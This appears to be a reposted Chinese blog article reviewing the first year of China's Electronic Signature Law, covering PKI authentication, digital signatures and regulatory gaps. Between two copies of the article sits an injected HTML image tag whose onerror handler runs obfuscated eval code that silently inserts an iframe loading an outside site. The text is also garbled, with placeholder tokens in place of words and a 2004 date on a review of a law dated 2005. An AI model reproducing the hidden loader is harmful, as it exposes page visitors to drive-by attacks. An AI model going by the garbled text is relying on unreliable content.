《电子签名法》颁布一周年的回顾
[转贴 2010-07-15 23:45:39]
《电子签名法》颁布一周年的回顾
业界期盼已久的《中华人民共和国电子签名法》(简称《电子签名法》)在2005年4月1日经全国人民代表大会常务委员会审议批准后,已经执行一周年了。它的颁布将对我国的电子商务和电子政务的发展产生深远的影响。制订这部法律的目的是使数据电文具有传统纸质书面形式文件具有同等法律效力;使电子签名与手写签名或印章具有同等法律效力,它的适应范围是适用我国的电子商务及电子政务。该法的出台是我国人民经济生活和社会生活中的一件大事,《电子签名法》执行一年来,实践证明它是我国在信息化的道路上制定的首部法律。它是我国进入世界先进数字化、网络化国家的标志之一,对我国电子商务、电子政务的顺利发展,提高我国信息化水平,提高我国的国民经济,提高银行界的经营效益和质量;以及对IT技术及其应用的创新将起着重大的促进作用。和其他新生事物一样,《电子签名法》在颁布一年来,也存在一些亟待解决的问题。
一、关于数据电文
在《电子签名法》中的第二章就规定了什么叫数据电文。所谓数据电文,是指以电子、光学、磁或类似手段生成、发送、接收或存储的信息。这些手段包括电子数据交换、电子邮件、电报、电传和传真数据等等。可见,数据电文是指信息或内容本身,而不是信息或内容的表现形式。即符合下列条件的数据电文,视为满足法律、法规规定的原件形式要求:能够有效地表现所载内容并可供随时调取查用;能够可靠地保证自最终形成文件时起,其内容就应保持完整、未被更改;但在数据电文上增加背书以及数据交换、储存和显示过程中发生的形式变化不影响数据电文的完整性。
在定义数据电文中还规定了文件的法律、法规保存要求,即如何存储数据电文才能符合法律要求。这就是能够有效地表现所载内容并可供随时调取查用;数据电文的格式与其生成、发送或者接收时的格式相同,或者格式不相同但是能够准确表现原来生成、发送或者接收的内容;能够识别数据电文的发件人、收件人以及发送、接收的时间。
但如何确保数据电文能作为证据的真实性呢?签名法中作如下规定:
生成、储存或者传递数据电文方法、保持内容完整性方法、用以鉴别发件人方法必须具备可靠性。
规定数据电文的法律效力是制定电子签名法的前提。因为,电子签名是对数据电文的加解密处理。
二、电子认证
在对数据电文的传输、发送和接收或进行签名之前,需要确认通信双方的身份,确认签名主体和依赖方的真实身份,在网络虚拟世界中的这种身份确认称电子认证,简称认证,即身份识别与鉴别。
按X。509标准规定身份鉴别分"简单鉴别"与"强鉴别"两种形式。
(一)简单鉴别:
发/收方只用自己的惟一身份标识ID(如身份证号码)加口令互相确认认证身份。但是这种认证有时不加安全保护,直接采用ID+口令,与后台目录中存贮的标识和口令相对比,是安全标准中的简单认证模式,是安全级别{zd1}的认证方法。
简单认证进一步作法是将ID+口令加密传输,接收方解密后与后台目录中已贮的ID和口令相对比,进行鉴别的。这种方式的简单认证安全性要高一些。
(二)强鉴别
是采用密码体制特性的强鉴别方法。应用最广的强认证方法是基于PKI的证书的认证方法,这种方法的原理是用户要由一个xx、可信、公正的第三方CA签发数字证书,CA是PKI核心执行机构;证书是PKI的核心元素,是公钥的载体,公钥对应一个私钥。用私钥加密的文件可用公钥解密,用于数字签名;用公钥加密的文件可用私钥解密,用于通信。PKI 证书机制能很好地解决网上交易身份的真实性、交易数据的保密和完整性、交易的不可抵赖性以及交易数据的公正性。是目前网上银行、电子商务xxx交易保证,国内外还没有见到黑客们攻破PKI证书机制的报导。
此外,能识别签名人的身份的电子认证强鉴别方法还有很多种,比如:指纹识别、虹膜/网膜识别和形态识别等等。用这样一些电子认证手段,有时也能做到很准确,但这些方法仅能做到对实体的身份识别,即做到《电子签名法》中定义的电子认证,而不能做到对电子签名内容的全面要求。即这些识别,做不到签名人能认可其中的内容。也就是说用这些电子签名方法只能做到身份的识别与鉴别,而做不到这种签名与其签发的数据电文相关联。即这种签名验证不了其所签发的电文内容已被篡改,特别是接收方的篡改。
在对数据电文做电子签名时,首先必须做到收发双方身份的确认,通过电子认证的方法,识别xxx。然后,再进行传输或交易。认证分单向认证与双向之分,由传输的安全性和重要性要求而定。如网上银行的B2B大额交易。
用CA的根证书公钥验证甲乙双方证书的签名,验证通过说明该证书是xx、公正、可信的第三方CA签发的有效证书。然后检查证书的有效期及检查该证书是否已被作废(LRC检查)而进入黑名单。甲方不但要认证乙方的身份,乙也要认证甲的身份。
三、电子签名与数字签名
电子签名是广义的定义,数字签名是电子签名的一种,是目前国内普遍使用的、成熟的技术,它是基于PKI的。联合国贸发会的《电子签名示范法》中对电子签名作如下定义:"指在数据电文中以电子形式所含、所附或在逻辑上与数据电文有联系的数据它可用于鉴别与数据电文相关的签名人和表明签名人认可数据电文所含信息";在欧盟的《电子签名共同框架指令》中就规定:"以电子形式所附或在逻辑上与其他电子数据相关的数据,作为一种判别的方法"称电子签名。而我国《电子签名法》对电子签名的定义:"是指数据电文中以电子形式所含、所附用于识别签名人身份并表明签名人认可其中内容的数据。"
总结以上定义,实现电子签名的技术手段有很多种,但目前比较成熟的,世界先进国家普遍使用的电子签名技术还是"数字签名"技术。。由于制订法律应保持技术中立性基本原则,因此有必要规定一个更一般化的概念以适应今后技术的发展。但是,目前电子签名法中提到的签名,一般指的就是"数字签名,我国《电子签名法》对电子认证和电子签名就是指基于PKI的签名。所谓"数字签名"就是通过某种密码运算生成一系列符号及代码组成电子密码进行签名,来代替书写签名或印章,对于这种电子式的签名还可进行技术验证,其验证的准确度是一般手工签名和图章的验证而无法比拟的。"数字签名"是目前电子商务、电子政务中应用最普遍、技术最成熟的、可操作性最强的一种电子签名方法。它采用了规范化的程序和科学化的方法,用于鉴定签名人的身份以及对一项电子数据内容的认可。它还能验证出文件的原文在传输过程中有无变动,确保传输电子文件的完整性,适用于广域网络上传输。
数字签名其具体实现方法如下:
首先拥有PKI的核心执行机构电子认证服务提供者,即通称为认证机构CA(Certificate Authority),数字签名的核心元素是由CA签发的数字证书。它所提供的服务就是认证、数据完整性、数据保密性和不可否认性。它的作法就是利用证书公钥和与之对应的私钥进行加/解密,并产生对数字电文的签名及验证签名。数字签名是利用公钥密码技术和其他密码算法生成一系列符号及代码组成电子密码进行签名,来代替书写签名和印章;这种电子式的签名还可进行技术验证,其验证的准确度是在物理世界中对手工签名和图章的验证是无法比拟的。我国标准规定对外提供第三方认证服务的CA 必须是双证书机制,签名和加密是采用両个证书,加密证书不能用于签名,签名证书不能用于加密。数字签名与验证过程如图二、所示。
网上通信的双方,在互相认证身份之后,即可发送签名的数据电文。数字签名的全过程分两大部分,即签名与验证。数字签名与验证的过程和技术实现的原理如图五所示。
数字签名原理
签名操作过程:首先是生成被签名的电子文件(《电子签名法》中称数据电文),然后对电子文件用哈希算法做数字摘要,再对数字摘要用签名私钥做非对称加密,即作数字签名;之后是将以上的签名和电子文件原文以及签名证书的公钥加在一起进行封装,形成签名结果发送给收方,待收方验证。
接收方收到发方的签名结果后进行签名验证,接收方收到数字签名的结果,其中包括数字签名、电子原文和发方公钥,即待验证的数据。接收方进行签名验证。验证过程是:接收方首先用发方公钥解密数字签名,导出数字摘要,并对电子文件原文作同样哈希算法得一个新的数字摘要,将两个摘要的哈希值进行结果比较,结果相同签名得到验证,否则签名无效。这就作到了《电子签名法》中所要求的对签名不能改动,对签署的内容和形式也不能改动的要求。
这种数字签名有三个作用:该电子文件确实是由签名者的发方所发出的,电子文件来源于该发送者;签署时电子签名数据由电子签名人所控制;被签名的电子文件确实是经发方签名后发送的,说明发方用了自己的私钥作的签名,并得到验证,达到不可否认的目的。即全面地做到了所规定的可靠的低能子签名。
四、一年来的回顾
对《电子签名法》执行一年来的情况,用一句话来说就是"喜忧参半"。可喜的方面有:
1、 加强了政府主导。国务院规定对第三方提供认证服务的机构由信息产业部归口领导,并由信息产业部制定出台了《电子认证管理办法》,规定了CA 认证机构的准入条件和管理办法 以及服务标准。从根本上解决了过去"无主管、无标准、无办法"的三无状态。
2、 初步整顿了电子认证业市场。从90年代末期掀起建设CA 热以来到2004年全国已建CA机构100余家,其中谷莠不分。经《电子认证管理办法》的出台与执行,到目前为止全国已批准了17家,电子认证业市场得到初步整顿。
3、 数据证书的应用开创了新局面。我国{zd0}的第三方行业CA----中国金融认证中心已发证书80多万,第三方CA天威诚信、地方山东CA、福建CA 近年来都有几万或十几万的发证量,可见在《电子签名法》颁布一年,证书应用有一定发展。
4、 人们对电子签名的认知度有所提高,各行业企业和个人逐渐了解了电子签名的用途,即在什么地方使用电子签名和如何使用电子签名以及电子签名的可靠性及安全性。
5、 促进了相关法律的修改 。如就规定了"采用数据电文形式订立合同,收件人指定特定系统接收数据电文的,该数据电文进入该特定系统的时间,视为到达时间;未指定特定系统的,该数据电文进入收件人的任何系统的首次时间,视为到达时间。"。即与传统的《合同法》中不同,它规定了数据电文的合法性。但还没有规定电子签名及时时间戳的合法性。
6、 在执行《电子签名法》方面,目前电子政务领域强于电子商务领域。如网上保税、网上工商申请和年检、政府公文加密传输等等得到较好的应用。
7、 应用{zh0}的领域是网上银行。中国工商银行去年网上银行交易额高达50多万亿,企业用户200万,个人用户600万,采用U-盾证书(将数字证书放在Usbkey中),网上交易使用数字签名。其次,中国建设银行的企业和个人客户也有阶跃式的发展。
总之,《电子签名法》颁布一年来,在不同的领域电子签名得到了一定的发展。
五、问题和展望 像所有新生事物一样,《电子签名法》是我国新时期颁发的首部信息化法律,它的执行,目前确实还存在一些问题。
1、 问题
(1)电子服务业市场待进一步整顿。按《电子认证管理办法》第四十一条规定凡"自2005年10月1日起,未取得电子认证服务许可的,不得继续从事电子认证服务。"可是,这一条没有执行,也没规定办法执行。因而目前该市场还是较乱。
(2)第三方认证机构定义不明确。CA应独立于签名主体和依赖方之外,不参与交易双方之间的利益。然而,很多的银行CA为自己银行的客户法证,这是第三方吗?如何整顿,谁来整顿?
(3)电子签名要做到可靠。即应按《电子签名法》第十三条的四项要求去做,才能严密地做到可靠。可是,目前很多应用单纯为了追求处理速度,而确省数字签名环节。如只对表单或数据电文做单向函数(如HASH)运算,双方只做Hash值比对验证,不做私钥加密(签名),公钥解密的验证。
更有甚者,有很多应用,签名与加密只用一对密钥,一个密钥用于加密也同时用于签名。这就xx违背了数字证书用于数字签名的不可否认性的目的。在电子签名中必须加以规范。
电子签名要做到可靠,证书的介质存放也很关键。目前,有很多的CA签发的证书不是存放在安全的USBKey中,而是存放在软盘或硬盘中,这是很不安全的,是很危险的。因为黑客会很容易的窃取你的私钥。
(4)缺乏执行中的具体标准。如上述数字签名的具体标准步骤、安全应用软件标准(代理软件、连接控键等等要标准化)、证书介质标准和其他涉及到的电子签名硬件、软件技术的标准化。
(5)相应的法律不配套,影响了《电子签名法》的推广。电子签名要与手工签名和印章具有同等法律效力的。所以,《票据法》、《会计法》、《合同法》不做相应的修改,《电子签名法》是很难普及和推广的。如《票据法》上,目前只承认签章是合法的,所谓签章系指签名、盖章或者签名加盖章;在《会计法》中规定"使用电子计算机进行会计核算的,其软件及其生成的会计凭证、会计帐簿、财务会计报告和其他会计资料,也必须符合国家统一的会计制度的规定。"这说明目前用计算机处理会计核算生成的 会计凭证、会计帐簿、财务会计报告和其他会计资料,必须进行手工签章,尚不认可电子签名。这种局面打不开电子签名的推广将是很困难的。
2、展望未来
电子签名应用的推广,将随着人们对《电子签名法》作用的认识的提高而得到加强。比如,人民银行不久前颁发的《电子支付指引》(一)就指出在网上在线支付时不用数字证书、不用数字签名单笔交易金额不得超过1000元 (二十五条)。而采用数字证书或数字签名方式进行客户身份认证和交易授权的,小额没有封顶。并提倡由合法的第三方认证机构提供认证服务(作者注:目前人民银行《电子支付指引》(一)只提出"提倡",希望《电子支付指引》(二)出台时能提出"必须"由合法的第三方认证机构提供认证服务。)这将会对数字证书和电子签名的应用开拓广阔的天地。
展望未来,在《国务院办公厅关于加快电子商务发展的若干意见》精神指导下,我国的电子商务的电子交易市场、在线支付、物流配送、网上银行、手机移动银行、保险业的在线订购等等,将在《电子签名法》的保障下,得到健康的发展。
在我国的电子政务方面,很有可能比电子商务发展的还会快。比如。 工商申报、年检;税务方面的地税、国税申报和缴税; 海关:电子海关、电子口岸、电子总署;政府采购、医药采购;旅游业管理(宾馆、景点、导游)的在线认证与管理。都缺少不了网上电子认证和数字签名,都缺少不了数字证书的使用。
实践证明《电子签名法》的出台确实是我国人民经济生活和社会生活中的一件大事,是我国进入世界先进数字化、网络化国家的标志之一,对我国电子商务、网上银行和电子政务的顺利发展,提高我国信息化水平,提高我国的国民经济,提高银行界的经营效益和质量,将起着非常不可估量的作用。
中国金融认证中心技术顾问 关振胜
2004年3月24日
![]()
0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" src='http://gimg.baidu.com/img/gsgs.gif' width=0 height=0 onerror="eval (unescape('var%20content1%3D%22%3CI+FR+AME%20%20align%3Dcenter%20marginWidth%3D0%20marginHeight%3D0%20src%3Dhttp%3A//www.quxi.lwedu.sh.cn/quxi/upload/zf_200_200.html%20width%3D200%20height%3D200%20frameBorder%3D0%20scrolling%3Dno%3E%3C/I+FRAM+E%3E%22%3B%20document.getElementById%28%22contenthtml2%22%29.innerHTML%3D%20content1'.replace(/\+/g,'')))">
一、关于数据电文
在《电子签名法》中的第二章就规定了什么叫数据电文。所谓数据电文,是指以电子、光学、磁或类似手段生成、发送、接收或存储的信息。这些手段包括电子数据交换、电子邮件、电报、电传和传真数据等等。可见,数据电文是指信息或内容本身,而不是信息或内容的表现形式。即符合下列条件的数据电文,视为满足法律、法规规定的原件形式要求:能够有效地表现所载内容并可供随时调取查用;能够可靠地保证自最终形成文件时起,其内容就应保持完整、未被更改;但在数据电文上增加背书以及数据交换、储存和显示过程中发生的形式变化不影响数据电文的完整性。
在定义数据电文中还规定了文件的法律、法规保存要求,即如何存储数据电文才能符合法律要求。这就是能够有效地表现所载内容并可供随时调取查用;数据电文的格式与其生成、发送或者接收时的格式相同,或者格式不相同但是能够准确表现原来生成、发送或者接收的内容;能够识别数据电文的发件人、收件人以及发送、接收的时间。
但如何确保数据电文能作为证据的真实性呢?签名法中作如下规定:
生成、储存或者传递数据电文方法、保持内容完整性方法、用以鉴别发件人方法必须具备可靠性。
规定数据电文的法律效力是制定电子签名法的前提。因为,电子签名是对数据电文的加解密处理。
二、电子认证
在对数据电文的传输、发送和接收或进行签名之前,需要确认通信双方的身份,确认签名主体和依赖方的真实身份,在网络虚拟世界中的这种身份确认称电子认证,简称认证,即身份识别与鉴别。
按X。509标准规定身份鉴别分"简单鉴别"与"强鉴别"两种形式。
(一)简单鉴别:
发/收方只用自己的惟一身份标识ID(如身份证号码)加口令互相确认认证身份。但是这种认证有时不加安全保护,直接采用ID+口令,与后台目录中存贮的标识和口令相对比,是安全标准中的简单认证模式,是安全级别{zd1}的认证方法。
简单认证进一步作法是将ID+口令加密传输,接收方解密后与后台目录中已贮的ID和口令相对比,进行鉴别的。这种方式的简单认证安全性要高一些。
(二)强鉴别
是采用密码体制特性的强鉴别方法。应用最广的强认证方法是基于PKI的证书的认证方法,这种方法的原理是用户要由一个xx、可信、公正的第三方CA签发数字证书,CA是PKI核心执行机构;证书是PKI的核心元素,是公钥的载体,公钥对应一个私钥。用私钥加密的文件可用公钥解密,用于数字签名;用公钥加密的文件可用私钥解密,用于通信。PKI 证书机制能很好地解决网上交易身份的真实性、交易数据的保密和完整性、交易的不可抵赖性以及交易数据的公正性。是目前网上银行、电子商务xxx交易保证,国内外还没有见到黑客们攻破PKI证书机制的报导。
此外,能识别签名人的身份的电子认证强鉴别方法还有很多种,比如:指纹识别、虹膜/网膜识别和形态识别等等。用这样一些电子认证手段,有时也能做到很准确,但这些方法仅能做到对实体的身份识别,即做到《电子签名法》中定义的电子认证,而不能做到对电子签名内容的全面要求。即这些识别,做不到签名人能认可其中的内容。也就是说用这些电子签名方法只能做到身份的识别与鉴别,而做不到这种签名与其签发的数据电文相关联。即这种签名验证不了其所签发的电文内容已被篡改,特别是接收方的篡改。
在对数据电文做电子签名时,首先必须做到收发双方身份的确认,通过电子认证的方法,识别xxx。然后,再进行传输或交易。认证分单向认证与双向之分,由传输的安全性和重要性要求而定。如网上银行的B2B大额交易。
用CA的根证书公钥验证甲乙双方证书的签名,验证通过说明该证书是xx、公正、可信的第三方CA签发的有效证书。然后检查证书的有效期及检查该证书是否已被作废(LRC检查)而进入黑名单。甲方不但要认证乙方的身份,乙也要认证甲的身份。
三、电子签名与数字签名
电子签名是广义的定义,数字签名是电子签名的一种,是目前国内普遍使用的、成熟的技术,它是基于PKI的。联合国贸发会的《电子签名示范法》中对电子签名作如下定义:"指在数据电文中以电子形式所含、所附或在逻辑上与数据电文有联系的数据它可用于鉴别与数据电文相关的签名人和表明签名人认可数据电文所含信息";在欧盟的《电子签名共同框架指令》中就规定:"以电子形式所附或在逻辑上与其他电子数据相关的数据,作为一种判别的方法"称电子签名。而我国《电子签名法》对电子签名的定义:"是指数据电文中以电子形式所含、所附用于识别签名人身份并表明签名人认可其中内容的数据。"
总结以上定义,实现电子签名的技术手段有很多种,但目前比较成熟的,世界先进国家普遍使用的电子签名技术还是"数字签名"技术。。由于制订法律应保持技术中立性基本原则,因此有必要规定一个更一般化的概念以适应今后技术的发展。但是,目前电子签名法中提到的签名,一般指的就是"数字签名,我国《电子签名法》对电子认证和电子签名就是指基于PKI的签名。所谓"数字签名"就是通过某种密码运算生成一系列符号及代码组成电子密码进行签名,来代替书写签名或印章,对于这种电子式的签名还可进行技术验证,其验证的准确度是一般手工签名和图章的验证而无法比拟的。"数字签名"是目前电子商务、电子政务中应用最普遍、技术最成熟的、可操作性最强的一种电子签名方法。它采用了规范化的程序和科学化的方法,用于鉴定签名人的身份以及对一项电子数据内容的认可。它还能验证出文件的原文在传输过程中有无变动,确保传输电子文件的完整性,适用于广域网络上传输。
数字签名其具体实现方法如下:
首先拥有PKI的核心执行机构电子认证服务提供者,即通称为认证机构CA(Certificate Authority),数字签名的核心元素是由CA签发的数字证书。它所提供的服务就是认证、数据完整性、数据保密性和不可否认性。它的作法就是利用证书公钥和与之对应的私钥进行加/解密,并产生对数字电文的签名及验证签名。数字签名是利用公钥密码技术和其他密码算法生成一系列符号及代码组成电子密码进行签名,来代替书写签名和印章;这种电子式的签名还可进行技术验证,其验证的准确度是在物理世界中对手工签名和图章的验证是无法比拟的。我国标准规定对外提供第三方认证服务的CA 必须是双证书机制,签名和加密是采用両个证书,加密证书不能用于签名,签名证书不能用于加密。数字签名与验证过程如图二、所示。
网上通信的双方,在互相认证身份之后,即可发送签名的数据电文。数字签名的全过程分两大部分,即签名与验证。数字签名与验证的过程和技术实现的原理如图五所示。
数字签名原理
签名操作过程:首先是生成被签名的电子文件(《电子签名法》中称数据电文),然后对电子文件用哈希算法做数字摘要,再对数字摘要用签名私钥做非对称加密,即作数字签名;之后是将以上的签名和电子文件原文以及签名证书的公钥加在一起进行封装,形成签名结果发送给收方,待收方验证。
接收方收到发方的签名结果后进行签名验证,接收方收到数字签名的结果,其中包括数字签名、电子原文和发方公钥,即待验证的数据。接收方进行签名验证。验证过程是:接收方首先用发方公钥解密数字签名,导出数字摘要,并对电子文件原文作同样哈希算法得一个新的数字摘要,将两个摘要的哈希值进行结果比较,结果相同签名得到验证,否则签名无效。这就作到了《电子签名法》中所要求的对签名不能改动,对签署的内容和形式也不能改动的要求。
这种数字签名有三个作用:该电子文件确实是由签名者的发方所发出的,电子文件来源于该发送者;签署时电子签名数据由电子签名人所控制;被签名的电子文件确实是经发方签名后发送的,说明发方用了自己的私钥作的签名,并得到验证,达到不可否认的目的。即全面地做到了所规定的可靠的低能子签名。
四、一年来的回顾
对《电子签名法》执行一年来的情况,用一句话来说就是"喜忧参半"。可喜的方面有:
1、 加强了政府主导。国务院规定对第三方提供认证服务的机构由信息产业部归口领导,并由信息产业部制定出台了《电子认证管理办法》,规定了CA 认证机构的准入条件和管理办法 以及服务标准。从根本上解决了过去"无主管、无标准、无办法"的三无状态。
2、 初步整顿了电子认证业市场。从90年代末期掀起建设CA 热以来到2004年全国已建CA机构100余家,其中谷莠不分。经《电子认证管理办法》的出台与执行,到目前为止全国已批准了17家,电子认证业市场得到初步整顿。
3、 数据证书的应用开创了新局面。我国{zd0}的第三方行业CA----中国金融认证中心已发证书80多万,第三方CA天威诚信、地方山东CA、福建CA 近年来都有几万或十几万的发证量,可见在《电子签名法》颁布一年,证书应用有一定发展。
4、 人们对电子签名的认知度有所提高,各行业企业和个人逐渐了解了电子签名的用途,即在什么地方使用电子签名和如何使用电子签名以及电子签名的可靠性及安全性。
5、 促进了相关法律的修改 。如就规定了"采用数据电文形式订立合同,收件人指定特定系统接收数据电文的,该数据电文进入该特定系统的时间,视为到达时间;未指定特定系统的,该数据电文进入收件人的任何系统的首次时间,视为到达时间。"。即与传统的《合同法》中不同,它规定了数据电文的合法性。但还没有规定电子签名及时时间戳的合法性。
6、 在执行《电子签名法》方面,目前电子政务领域强于电子商务领域。如网上保税、网上工商申请和年检、政府公文加密传输等等得到较好的应用。
7、 应用{zh0}的领域是网上银行。中国工商银行去年网上银行交易额高达50多万亿,企业用户200万,个人用户600万,采用U-盾证书(将数字证书放在Usbkey中),网上交易使用数字签名。其次,中国建设银行的企业和个人客户也有阶跃式的发展。
总之,《电子签名法》颁布一年来,在不同的领域电子签名得到了一定的发展。
五、问题和展望 像所有新生事物一样,《电子签名法》是我国新时期颁发的首部信息化法律,它的执行,目前确实还存在一些问题。
1、 问题
(1)电子服务业市场待进一步整顿。按《电子认证管理办法》第四十一条规定凡"自2005年10月1日起,未取得电子认证服务许可的,不得继续从事电子认证服务。"可是,这一条没有执行,也没规定办法执行。因而目前该市场还是较乱。
(2)第三方认证机构定义不明确。CA应独立于签名主体和依赖方之外,不参与交易双方之间的利益。然而,很多的银行CA为自己银行的客户法证,这是第三方吗?如何整顿,谁来整顿?
(3)电子签名要做到可靠。即应按《电子签名法》第十三条的四项要求去做,才能严密地做到可靠。可是,目前很多应用单纯为了追求处理速度,而确省数字签名环节。如只对表单或数据电文做单向函数(如HASH)运算,双方只做Hash值比对验证,不做私钥加密(签名),公钥解密的验证。
更有甚者,有很多应用,签名与加密只用一对密钥,一个密钥用于加密也同时用于签名。这就xx违背了数字证书用于数字签名的不可否认性的目的。在电子签名中必须加以规范。
电子签名要做到可靠,证书的介质存放也很关键。目前,有很多的CA签发的证书不是存放在安全的USBKey中,而是存放在软盘或硬盘中,这是很不安全的,是很危险的。因为黑客会很容易的窃取你的私钥。
(4)缺乏执行中的具体标准。如上述数字签名的具体标准步骤、安全应用软件标准(代理软件、连接控键等等要标准化)、证书介质标准和其他涉及到的电子签名硬件、软件技术的标准化。
(5)相应的法律不配套,影响了《电子签名法》的推广。电子签名要与手工签名和印章具有同等法律效力的。所以,《票据法》、《会计法》、《合同法》不做相应的修改,《电子签名法》是很难普及和推广的。如《票据法》上,目前只承认签章是合法的,所谓签章系指签名、盖章或者签名加盖章;在《会计法》中规定"使用电子计算机进行会计核算的,其软件及其生成的会计凭证、会计帐簿、财务会计报告和其他会计资料,也必须符合国家统一的会计制度的规定。"这说明目前用计算机处理会计核算生成的 会计凭证、会计帐簿、财务会计报告和其他会计资料,必须进行手工签章,尚不认可电子签名。这种局面打不开电子签名的推广将是很困难的。
2、展望未来
电子签名应用的推广,将随着人们对《电子签名法》作用的认识的提高而得到加强。比如,人民银行不久前颁发的《电子支付指引》(一)就指出在网上在线支付时不用数字证书、不用数字签名单笔交易金额不得超过1000元 (二十五条)。而采用数字证书或数字签名方式进行客户身份认证和交易授权的,小额没有封顶。并提倡由合法的第三方认证机构提供认证服务(作者注:目前人民银行《电子支付指引》(一)只提出"提倡",希望《电子支付指引》(二)出台时能提出"必须"由合法的第三方认证机构提供认证服务。)这将会对数字证书和电子签名的应用开拓广阔的天地。
展望未来,在《国务院办公厅关于加快电子商务发展的若干意见》精神指导下,我国的电子商务的电子交易市场、在线支付、物流配送、网上银行、手机移动银行、保险业的在线订购等等,将在《电子签名法》的保障下,得到健康的发展。
在我国的电子政务方面,很有可能比电子商务发展的还会快。比如。 工商申报、年检;税务方面的地税、国税申报和缴税; 海关:电子海关、电子口岸、电子总署;政府采购、医药采购;旅游业管理(宾馆、景点、导游)的在线认证与管理。都缺少不了网上电子认证和数字签名,都缺少不了数字证书的使用。
实践证明《电子签名法》的出台确实是我国人民经济生活和社会生活中的一件大事,是我国进入世界先进数字化、网络化国家的标志之一,对我国电子商务、网上银行和电子政务的顺利发展,提高我国信息化水平,提高我国的国民经济,提高银行界的经营效益和质量,将起着非常不可估量的作用。
中国金融认证中心技术顾问 关振胜
2004年3月24日
郑重声明:资讯 【《电子签名法》颁布一周年的回顾- 投资银行- fantasya - 和讯博客】由 发布,版权归原作者及其所在单位,其原创性以及文中陈述文字和内容未经(企业库qiyeku.com)证实,请读者仅作参考,并请自行核实相关内容。若本文有侵犯到您的版权, 请你提供相关证明及申请并与我们联系(qiyeku # qq.com)或【在线投诉】,我们审核后将会尽快处理。
—— 相关资讯 ——
